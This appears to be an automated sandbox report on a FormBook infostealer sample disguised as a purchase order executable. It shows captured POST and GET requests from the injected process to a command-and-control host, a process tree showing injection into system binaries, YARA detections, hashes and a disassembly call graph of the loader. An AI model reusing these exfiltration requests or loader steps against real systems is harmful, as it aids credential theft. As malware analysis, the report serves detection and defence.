                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    35192.168.2.54974843.242.202.169804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:04:57.113065004 CEST1761OUTPOST /ed2j/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.mizuquan.top
                    Origin: http://www.mizuquan.top
                    Referer: http://www.mizuquan.top/ed2j/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 1239
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 4b 6c 77 76 31 45 45 4e 6d 63 63 50 79 71 4d 5a 66 32 4f 6a 4a 34 38 32 42 2f 53 79 42 6a 55 35 63 4d 72 2f 51 62 77 49 35 76 56 2f 54 55 70 2b 65 6a 2b 62 54 41 37 57 6f 46 62 48 74 42 2f 36 62 62 37 7a 72 43 4c 35 68 30 2f 62 71 32 53 4d 6a 52 76 77 41 4f 71 4c 75 62 77 47 30 43 7a 2b 75 55 75 34 58 30 49 79 54 62 4d 2f 69 74 64 4c 77 64 58 7a 6c 78 46 5a 42 32 52 59 53 48 7a 63 63 79 76 52 57 2b 75 4c 36 51 74 79 52 6d 4e 65 55 65 34 74 49 4e 54 58 31 78 58 70 70 43 6d 32 35 53 59 2b 77 34 6f 54 67 4f 2f 2b 79 2f 42 46 69 4c 41 62 76 71 74 39 72 70 69 6b 6d 37 54 46 38 75 4a 78 35 64 32 72 35 42 65 71 6d 6f 6a 71 32 4c 74 59 70 59 36 56 6d 69 6f 49 50 73 73 41 43 76 6d 71 46 77 64 56 31 78 78 6e 47 44 6e 2f 33 33 50 69 43 59 63 6e 33 36 75 63 34 74 69 71 46 55 43 2f 65 51 6a 6c 56 79 52 46 49 2f 6c 2b 39 6c 70 54 45 46 4d 2f 33 31 77 46 79 56 30 6f 39 58 52 50 43 39 68 53 6f 4b 39 2f 4a 49 32 58 68 53 56 30 38 35 38 71 61 69 41 75 58 47 4f 32 46 42 4b 63 30 4c 34 37 4a 33 74 34 76 46 65 [TRUNCATED]
                    Data Ascii: nR=Klwv1EENmccPyqMZf2OjJ482B/SyBjU5cMr/QbwI5vV/TUp+ej+bTA7WoFbHtB/6bb7zrCL5h0/bq2SMjRvwAOqLubwG0Cz+uUu4X0IyTbM/itdLwdXzlxFZB2RYSHzccyvRW+uL6QtyRmNeUe4tINTX1xXppCm25SY+w4oTgO/+y/BFiLAbvqt9rpikm7TF8uJx5d2r5Beqmojq2LtYpY6VmioIPssACvmqFwdV1xxnGDn/33PiCYcn36uc4tiqFUC/eQjlVyRFI/l+9lpTEFM/31wFyV0o9XRPC9hSoK9/JI2XhSV0858qaiAuXGO2FBKc0L47J3t4vFeSBNV1onTWEL3CuOF8QcOzPfl8Fo6S5HVZ5AX0N6j22evLQ01kRNSte5FnXoT8sSqbBYwqZjO4A2ykQJ6hxX7TM0zEGyH/ZMZZwblXn4KniHj3JRzACOn93FYthZuqbERAYWr2SI3uShjsA93N20JOLT4kungOKQy8UgFywnw70LJPF1OYoTusHxoqajfAcjTCTIQFl1F2HzMB8roRHtspmkzv4uW8FoAracJuGBj6FUitND6iloWZ3xS7c78YxeApvnx2OhA265kLUC+Hh0ZQD62yLfiL1vdCwexdnYOh11wij7fZIIVNn3CgDW78a/TWpjFd2NLplT6s4hwC9WFp+szpPK0neMBWapgppVzPWthtx1IZ3xDyGC9O8hnbL4ptfDHWwDfoXNCDHt4X1LvbPS0/QhXyLcWOX44wCxqv7QC8SMKXqcj0Ke9jLc7ccFLZ+53WRjaD6LVz3ITWWGqrnFTVuwYC0PSpNlkln7sbBUa+PS5oqXIFEb9PXfegRoA6ey8E9yII3bc1pBjLM3O3JSeheQBqKwAyBdhxmQwS7mwC6E0643+C5Jd/9io311MvgFEjQzoRxBOaQxpYMOTvWqfawtTFcK+uYelT0oium4Rqx0ViwqmjgBBMYc2Uud4RZcor7Q/V7v3kTeOUwYBIicdCD76Fc0IDW [TRUNCATED]
                    Sep 12, 2024 13:04:58.135854959 CEST691INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:04:57 GMT
                    Content-Type: text/html
                    Content-Length: 548
                    Connection: close
                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    36192.168.2.54974943.242.202.169804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:04:59.659583092 CEST459OUTGET /ed2j/?nR=HnYP2yoU4dt40olsHjvCR7kBP/y2BgIkbcmGMLslyKV8dFp2SGuaYgvLul2clibdaJeHhADQmhDO4iexoifjcdOeiKY5v07N606wVFpuauJi0/RjjYjigABfPEh6YVaweA==&OJ=btRp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Language: en-US,en
                    Host: www.mizuquan.top
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Sep 12, 2024 13:05:00.602796078 CEST691INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:05:00 GMT
                    Content-Type: text/html
                    Content-Length: 548
                    Connection: close
                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:07:01:59
                    Start date:12/09/2024
                    Path:C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe"
                    Imagebase:0xa90000
                    File size:1'227'264 bytes
                    MD5 hash:74E3AD61908355D646036B6B13A20916
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:2
                    Start time:07:02:00
                    Start date:12/09/2024
                    Path:C:\Windows\SysWOW64\svchost.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe"
                    Imagebase:0xf20000
                    File size:46'504 bytes
                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2243312339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2243312339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2243639009.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2243639009.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2244045785.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2244045785.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:3
                    Start time:07:02:11
                    Start date:12/09/2024
                    Path:C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe"
                    Imagebase:0xf30000
                    File size:140'800 bytes
                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3887789383.0000000003A00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3887789383.0000000003A00000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:false

                    General

                    Target ID:4
                    Start time:07:02:14
                    Start date:12/09/2024
                    Path:C:\Windows\SysWOW64\RMActivate_ssp.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\SysWOW64\RMActivate_ssp.exe"
                    Imagebase:0xc40000
                    File size:478'720 bytes
                    MD5 hash:6599A09C160036131E4A933168DA245F
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3886646848.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3886646848.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3887684924.0000000000720000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3887684924.0000000000720000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3887626598.00000000006D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3887626598.00000000006D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    Reputation:moderate
                    Has exited:false

                    General

                    Target ID:6
                    Start time:07:02:27
                    Start date:12/09/2024
                    Path:C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe"
                    Imagebase:0xf30000
                    File size:140'800 bytes
                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3889597488.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3889597488.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:false

                    General

                    Target ID:8
                    Start time:07:02:44
                    Start date:12/09/2024
                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Imagebase:0x7ff79f9e0000
                    File size:676'768 bytes
                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:2.9%
                      Dynamic/Decrypted Code Coverage:1%
                      Signature Coverage:10.7%
                      Total number of Nodes:1722
                      Total number of Limit Nodes:146
                      execution_graph 108722 a9e8eb 108725 aa2b40 108722->108725 108724 a9e8f7 108726 aa2b98 108725->108726 108750 aa2bfc __wsetenvp _memmove 108725->108750 108727 aa2bbf 108726->108727 108729 aa33cb 108726->108729 108730 b07cf3 108726->108730 108800 ab010a 108727->108800 108814 a95577 346 API calls Mailbox 108729->108814 108731 b07cf8 108730->108731 108739 b07d15 108730->108739 108731->108727 108734 b07d01 108731->108734 108732 aa2be8 108735 ab010a 48 API calls 108732->108735 108837 aed443 346 API calls Mailbox 108734->108837 108735->108750 108736 b07d38 108839 add520 86 API calls 4 library calls 108736->108839 108739->108736 108838 aed8ff 346 API calls 2 library calls 108739->108838 108740 aa3157 108740->108724 108743 b08518 108743->108724 108744 b083d1 108847 add520 86 API calls 4 library calls 108744->108847 108745 b084df 108858 add520 86 API calls 4 library calls 108745->108858 108749 a9d349 53 API calls 108749->108750 108750->108740 108750->108744 108750->108745 108750->108749 108751 b083eb 108750->108751 108752 b07e43 108750->108752 108755 b08434 108750->108755 108757 a9d2d2 53 API calls 108750->108757 108759 ab1b2a 52 API calls __cinit 108750->108759 108761 b0844e 108750->108761 108763 aa345e 108750->108763 108764 a9d3d2 48 API calls 108750->108764 108765 b084b5 108750->108765 108767 b084c8 108750->108767 108770 a9fa40 346 API calls 108750->108770 108772 aa366d 108750->108772 108775 ab010a 48 API calls 108750->108775 108777 b081d7 108750->108777 108779 aa3637 108750->108779 108780 b084a4 108750->108780 108785 a9cdb4 48 API calls 108750->108785 108787 a9c935 48 API calls 108750->108787 108790 b0826c 108750->108790 108797 aca599 InterlockedDecrement 108750->108797 108809 a9ca8e 48 API calls 108750->108809 108810 a9d380 108750->108810 108815 a97e53 108750->108815 108824 a9346e 48 API calls 108750->108824 108825 a93320 108750->108825 108836 a9203a 346 API calls 108750->108836 108841 a9d89e 50 API calls Mailbox 108750->108841 108842 aed154 48 API calls 108750->108842 108843 adab1c 50 API calls 108750->108843 108848 add520 86 API calls 4 library calls 108751->108848 108840 add520 86 API calls 4 library calls 108752->108840 108850 add520 86 API calls 4 library calls 108755->108850 108757->108750 108759->108750 108851 add520 86 API calls 4 library calls 108761->108851 108849 add520 86 API calls 4 library calls 108763->108849 108764->108750 108856 add520 86 API calls 4 library calls 108765->108856 108857 add520 86 API calls 4 library calls 108767->108857 108770->108750 108859 add520 86 API calls 4 library calls 108772->108859 108775->108750 108844 aed154 48 API calls 108777->108844 108852 add520 86 API calls 4 library calls 108779->108852 108855 add520 86 API calls 4 library calls 108780->108855 108784 b0822c 108846 a9346e 48 API calls 108784->108846 108785->108750 108787->108750 108790->108740 108854 add520 86 API calls 4 library calls 108790->108854 108791 b081ea 108791->108784 108845 aed154 48 API calls 108791->108845 108793 b08259 108794 a93320 48 API calls 108793->108794 108796 b08261 108794->108796 108795 b08236 108795->108779 108795->108793 108796->108790 108798 b08478 108796->108798 108797->108750 108853 add520 86 API calls 4 library calls 108798->108853 108803 ab0112 __calloc_impl 108800->108803 108802 ab012c 108802->108732 108803->108802 108804 ab012e std::exception::exception 108803->108804 108860 ab45ec 108803->108860 108874 ab7495 RaiseException 108804->108874 108806 ab0158 108875 ab73cb 47 API calls _free 108806->108875 108808 ab016a 108808->108732 108809->108750 108811 a9d38b 108810->108811 108812 a9d3b4 108811->108812 108882 a9d772 55 API calls 108811->108882 108812->108750 108814->108740 108816 a97ecf 108815->108816 108819 a97e5f __wsetenvp 108815->108819 108887 a9a2fb 108816->108887 108818 a97e85 _memmove 108818->108750 108820 a97e7b 108819->108820 108821 a97ec7 108819->108821 108883 a9a6f8 108820->108883 108886 a97eda 48 API calls 108821->108886 108824->108750 108826 a93334 108825->108826 108828 a93339 Mailbox 108825->108828 108895 a9342c 48 API calls 108826->108895 108834 a93347 108828->108834 108896 a9346e 48 API calls 108828->108896 108830 ab010a 48 API calls 108832 a933d8 108830->108832 108831 a93422 108831->108750 108833 ab010a 48 API calls 108832->108833 108835 a933e3 108833->108835 108834->108830 108834->108831 108835->108750 108836->108750 108837->108740 108838->108736 108839->108750 108840->108740 108841->108750 108842->108750 108843->108750 108844->108791 108845->108791 108846->108795 108847->108751 108848->108740 108849->108740 108850->108761 108851->108740 108852->108740 108853->108740 108854->108740 108855->108740 108856->108740 108857->108740 108858->108740 108859->108743 108861 ab4667 __calloc_impl 108860->108861 108864 ab45f8 __calloc_impl 108860->108864 108881 ab889e 47 API calls __getptd_noexit 108861->108881 108862 ab4603 108862->108864 108876 ab8e52 47 API calls 2 library calls 108862->108876 108877 ab8eb2 47 API calls 8 library calls 108862->108877 108878 ab1d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 108862->108878 108864->108862 108866 ab462b RtlAllocateHeap 108864->108866 108869 ab4653 108864->108869 108872 ab4651 108864->108872 108866->108864 108868 ab465f 108866->108868 108868->108803 108879 ab889e 47 API calls __getptd_noexit 108869->108879 108880 ab889e 47 API calls __getptd_noexit 108872->108880 108874->108806 108875->108808 108876->108862 108877->108862 108879->108872 108880->108868 108881->108868 108882->108812 108884 ab010a 48 API calls 108883->108884 108885 a9a702 108884->108885 108885->108818 108886->108818 108888 a9a309 108887->108888 108890 a9a321 _memmove 108887->108890 108888->108890 108891 a9b8a7 108888->108891 108890->108818 108892 a9b8ba 108891->108892 108894 a9b8b7 _memmove 108891->108894 108893 ab010a 48 API calls 108892->108893 108893->108894 108894->108890 108895->108828 108896->108834 108897 13bc348 108911 13b9f98 108897->108911 108899 13bc3dd 108914 13bc238 108899->108914 108901 13bc406 CreateFileW 108903 13bc45a 108901->108903 108904 13bc455 108901->108904 108903->108904 108905 13bc471 VirtualAlloc 108903->108905 108905->108904 108906 13bc48f ReadFile 108905->108906 108906->108904 108907 13bc4aa 108906->108907 108908 13bb238 13 API calls 108907->108908 108909 13bc4dd 108908->108909 108910 13bc500 ExitProcess 108909->108910 108910->108904 108917 13bd408 GetPEB 108911->108917 108913 13ba623 108913->108899 108915 13bc241 Sleep 108914->108915 108916 13bc24f 108915->108916 108918 13bd432 108917->108918 108918->108913 108919 b0a0a7 108923 adaf66 108919->108923 108921 b0a0b2 108922 adaf66 84 API calls 108921->108922 108922->108921 108929 adafa0 108923->108929 108930 adaf73 108923->108930 108924 adafa2 108964 aaf833 81 API calls 108924->108964 108926 adafa7 108934 a984a6 108926->108934 108928 adafae 108954 a97b4b 108928->108954 108929->108921 108930->108924 108930->108926 108930->108929 108932 adaf9a 108930->108932 108963 aa4265 61 API calls _memmove 108932->108963 108935 a984be 108934->108935 108952 a984ba 108934->108952 108936 b05592 __i64tow 108935->108936 108937 b05494 108935->108937 108938 a984d2 108935->108938 108946 a984ea __itow Mailbox _wcscpy 108935->108946 108940 b0557a 108937->108940 108941 b0549d 108937->108941 108965 ab234b 80 API calls 3 library calls 108938->108965 108970 ab234b 80 API calls 3 library calls 108940->108970 108945 b054bc 108941->108945 108941->108946 108942 ab010a 48 API calls 108944 a984f4 108942->108944 108944->108952 108966 a9caee 108944->108966 108947 ab010a 48 API calls 108945->108947 108946->108942 108949 b054d9 108947->108949 108950 ab010a 48 API calls 108949->108950 108951 b054ff 108950->108951 108951->108952 108953 a9caee 48 API calls 108951->108953 108952->108928 108953->108952 108955 a97b5d 108954->108955 108956 b0240d 108954->108956 108971 a9bbd9 108955->108971 108977 acc0a2 48 API calls _memmove 108956->108977 108959 a97b69 108959->108929 108960 b02417 108978 a9c935 108960->108978 108962 b0241f Mailbox 108963->108929 108964->108926 108965->108946 108967 a9cafd __wsetenvp _memmove 108966->108967 108968 ab010a 48 API calls 108967->108968 108969 a9cb3b 108968->108969 108969->108952 108970->108946 108972 a9bbe7 108971->108972 108976 a9bc0d _memmove 108971->108976 108973 ab010a 48 API calls 108972->108973 108972->108976 108974 a9bc5c 108973->108974 108975 ab010a 48 API calls 108974->108975 108975->108976 108976->108959 108977->108960 108979 a9c948 108978->108979 108980 a9c940 108978->108980 108979->108962 108982 a9d805 108980->108982 108983 a9d828 _memmove 108982->108983 108984 a9d815 108982->108984 108983->108979 108984->108983 108985 ab010a 48 API calls 108984->108985 108985->108983 108986 b01eca 108991 aabe17 108986->108991 108990 b01ed9 108999 a9d3d2 108991->108999 108995 aabf22 108996 aabf3e 108995->108996 109007 aac8b7 48 API calls _memmove 108995->109007 108998 ab1b2a 52 API calls __cinit 108996->108998 108998->108990 109000 ab010a 48 API calls 108999->109000 109001 a9d3f3 109000->109001 109002 ab010a 48 API calls 109001->109002 109003 a9d401 109002->109003 109004 aac929 109003->109004 109008 aac955 109004->109008 109007->108995 109009 aac948 109008->109009 109010 aac962 109008->109010 109009->108995 109010->109009 109011 aac969 RegOpenKeyExW 109010->109011 109011->109009 109012 aac983 RegQueryValueExW 109011->109012 109013 aac9b9 RegCloseKey 109012->109013 109014 aac9a4 109012->109014 109013->109009 109014->109013 109015 ab6a80 109016 ab6a8c __tzset_nolock 109015->109016 109052 ab8b7b GetStartupInfoW 109016->109052 109018 ab6a91 109054 aba937 GetProcessHeap 109018->109054 109020 ab6ae9 109021 ab6af4 109020->109021 109139 ab6bd0 47 API calls 3 library calls 109020->109139 109055 ab87d7 109021->109055 109024 ab6afa 109025 ab6b05 __RTC_Initialize 109024->109025 109140 ab6bd0 47 API calls 3 library calls 109024->109140 109076 abba66 109025->109076 109028 ab6b14 109029 ab6b20 GetCommandLineW 109028->109029 109141 ab6bd0 47 API calls 3 library calls 109028->109141 109095 ac3c2d GetEnvironmentStringsW 109029->109095 109033 ab6b1f 109033->109029 109036 ab6b45 109108 ac3a64 109036->109108 109039 ab6b4b 109040 ab6b56 109039->109040 109143 ab1d7b 47 API calls 3 library calls 109039->109143 109122 ab1db5 109040->109122 109043 ab6b5e 109044 ab6b69 __wwincmdln 109043->109044 109144 ab1d7b 47 API calls 3 library calls 109043->109144 109126 a93682 109044->109126 109047 ab6b7d 109048 ab6b8c 109047->109048 109145 ab2011 47 API calls _doexit 109047->109145 109146 ab1da6 47 API calls _doexit 109048->109146 109051 ab6b91 __tzset_nolock 109053 ab8b91 109052->109053 109053->109018 109054->109020 109147 ab1e5a 30 API calls 2 library calls 109055->109147 109057 ab87dc 109148 ab8ab3 InitializeCriticalSectionAndSpinCount 109057->109148 109059 ab87e1 109060 ab87e5 109059->109060 109150 ab8afd TlsAlloc 109059->109150 109149 ab884d 50 API calls 2 library calls 109060->109149 109063 ab87ea 109063->109024 109064 ab87f7 109064->109060 109065 ab8802 109064->109065 109151 ab7616 109065->109151 109068 ab8844 109159 ab884d 50 API calls 2 library calls 109068->109159 109071 ab8849 109071->109024 109072 ab8823 109072->109068 109073 ab8829 109072->109073 109158 ab8724 47 API calls 4 library calls 109073->109158 109075 ab8831 GetCurrentThreadId 109075->109024 109077 abba72 __tzset_nolock 109076->109077 109168 ab8984 109077->109168 109079 abba79 109080 ab7616 __calloc_crt 47 API calls 109079->109080 109081 abba8a 109080->109081 109082 abbaf5 GetStartupInfoW 109081->109082 109084 abba95 __tzset_nolock @_EH4_CallFilterFunc@8 109081->109084 109090 abbc33 109082->109090 109092 abbb0a 109082->109092 109083 abbcf7 109175 abbd0b LeaveCriticalSection _doexit 109083->109175 109084->109028 109086 abbc7c GetStdHandle 109086->109090 109087 ab7616 __calloc_crt 47 API calls 109087->109092 109088 abbc8e GetFileType 109088->109090 109089 abbb58 109089->109090 109093 abbb8a GetFileType 109089->109093 109094 abbb98 InitializeCriticalSectionAndSpinCount 109089->109094 109090->109083 109090->109086 109090->109088 109091 abbcbb InitializeCriticalSectionAndSpinCount 109090->109091 109091->109090 109092->109087 109092->109089 109092->109090 109093->109089 109093->109094 109094->109089 109096 ab6b30 109095->109096 109098 ac3c3e 109095->109098 109102 ac382b GetModuleFileNameW 109096->109102 109214 ab7660 47 API calls std::exception::_Copy_str 109098->109214 109100 ac3c64 _memmove 109101 ac3c7a FreeEnvironmentStringsW 109100->109101 109101->109096 109103 ac385f _wparse_cmdline 109102->109103 109104 ab6b3a 109103->109104 109105 ac3899 109103->109105 109104->109036 109142 ab1d7b 47 API calls 3 library calls 109104->109142 109215 ab7660 47 API calls std::exception::_Copy_str 109105->109215 109107 ac389f _wparse_cmdline 109107->109104 109109 ac3a7d __wsetenvp 109108->109109 109113 ac3a75 109108->109113 109110 ab7616 __calloc_crt 47 API calls 109109->109110 109119 ac3aa6 __wsetenvp 109110->109119 109111 ac3afd 109112 ab28ca _free 47 API calls 109111->109112 109112->109113 109113->109039 109114 ab7616 __calloc_crt 47 API calls 109114->109119 109115 ac3b22 109116 ab28ca _free 47 API calls 109115->109116 109116->109113 109118 ac3b39 109217 ab7ab0 IsProcessorFeaturePresent 109118->109217 109119->109111 109119->109113 109119->109114 109119->109115 109119->109118 109216 ac3317 47 API calls 